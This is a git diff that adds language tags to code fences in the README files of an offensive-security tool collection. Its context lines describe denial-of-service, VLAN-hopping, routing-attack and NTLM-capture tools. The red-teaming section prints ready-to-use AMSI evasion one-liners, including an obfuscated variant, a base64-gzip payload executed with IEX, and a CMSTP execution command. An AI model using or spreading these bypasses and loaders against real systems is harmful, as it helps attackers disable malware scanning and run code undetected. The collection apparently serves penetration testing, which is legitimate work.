diff --git a/file-formats/README.md b/file-formats/README.md index 0e7b3a9..25461bf 100644 --- a/file-formats/README.md +++ b/file-formats/README.md @@ -2,7 +2,7 @@ - **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored. -``` +```powershell c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe :: tamperUpx - a small utility that corrupts UPX-packed executables, diff --git a/networks/README.md b/networks/README.md index c517f1f..ffd2f9b 100644 --- a/networks/README.md +++ b/networks/README.md @@ -3,7 +3,7 @@ - **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets. The effect will be similar to: -``` +```shell SW2960#show cdp traffic CDP counters : Total packets output: 361, Input: 11824 @@ -28,7 +28,7 @@ victim's premises or to aid Password-Spraying efforts against exposed OWA interface. Sample run: -``` +```powershell PS D:\> python3 .\exchangeRecon.py 10.10.10.9 :: Exchange Fingerprinter @@ -136,7 +136,7 @@ TODO: - Implement sniffer hunting for used protocols and their auth strings - Implement semi-auto mode that is first learning a network, then choosing specific attacks -``` +```bash bash $ python RoutingAttackKit.py :: Routing Protocols Exploitation toolkit @@ -236,7 +236,7 @@ Capturing on 'eth0' Sample output: -``` +```bash $ ./VLANHopperDTP.py --help :: VLAN Hopping via DTP Trunk negotiation diff --git a/others/README.md b/others/README.md index 5f3750b..3c17ae4 100644 --- a/others/README.md +++ b/others/README.md @@ -26,7 +26,7 @@ Takes two files on input. Tries to find every line of the second file within the - **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a) -``` +```bash user@my-box $ startkali [>] Launching kali in headless [>] Awaiting for machine to get up... diff --git a/red-teaming/README.md b/red-teaming/README.md index 87b554d..216ed52 100755 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -7,7 +7,7 @@ - **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself. -``` +```powershell PS > $ExecutionContext.SessionState.LanguageMode ConstrainedLanguage PS > .\Bypass-CLM.ps1 @@ -48,7 +48,7 @@ FullLanguage - **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage: -``` +```powershell cmstp.exe /ni /s cmstp.inf ``` @@ -63,7 +63,7 @@ cmstp.exe /ni /s cmstp.inf Example: -``` +```powershell $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); ``` @@ -78,7 +78,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes. -``` +```powershell PS > "amsiInitFailed" At line:1 char:1 + "amsiInitFailed" @@ -97,12 +97,12 @@ amsiInitFailed - OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases: * **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes. - ``` + ```powershell [Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) ``` * **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes) - ``` + ```powershell $h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5) ``` @@ -125,7 +125,7 @@ amsiInitFailed - `Import-ReconData -DirName ` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates. - `Get-ReconData -DirName ` - Gets names of variables that were created and contains previously imported data. -``` +```powershell PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09 Loaded $FileFinderSearchSYSVol results. Loaded $FileFinder results. @@ -176,7 +176,7 @@ This script can embed following data within constructed CSharp Task: Example output **not minimized**: -``` +```powershell C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 :: Powershell via MSBuild inline-task XML payload generation script @@ -233,7 +233,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox **minimized** -``` +```powershell C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m :: Powershell via MSBuild inline-task XML payload generation script @@ -251,13 +251,13 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`: -``` +```powershell PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree ``` or with new version of PowerView coming with it's `Get-DomainOU` cmdlet. -``` +```powershell PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree + CONTOSO + SharedFolders @@ -296,7 +296,7 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree - **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound. -``` +```bash $ ./markOwnedNodesInNeo4j.py kerberoasted.txt [.] Connected to neo4j instance. [.] Marking nodes (0..10) ... @@ -342,7 +342,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt - [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality -``` +```powershell C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true :: SharpWebServer :: @@ -377,7 +377,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200) * The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly -``` +```powershell PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. diff --git a/web/README.md b/web/README.md index 669a637..5614045 100644 --- a/web/README.md +++ b/web/README.md @@ -31,7 +31,7 @@ - **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee)) -``` +```python # Simple utility that aids the penetration tester when manually testing Padding Oracle condition # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # @@ -84,7 +84,7 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4 When `DEBUG` is turned on, the output may also look like: -``` +```bash $ ./reencode.py JTQxJTQxJTQxJTQx [.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" diff --git a/windows/README.md b/windows/README.md index 32ff455..9f38b0b 100644 --- a/windows/README.md +++ b/windows/README.md @@ -41,7 +41,8 @@ I've experienced following: Use `--verbose` for additional _field steps explanation_ output. Sample usage: -``` + +```powershell PS> python3 rdpFileUpload.py -v -f certutil README.md :: RDP file upload utility via Keyboard emulation.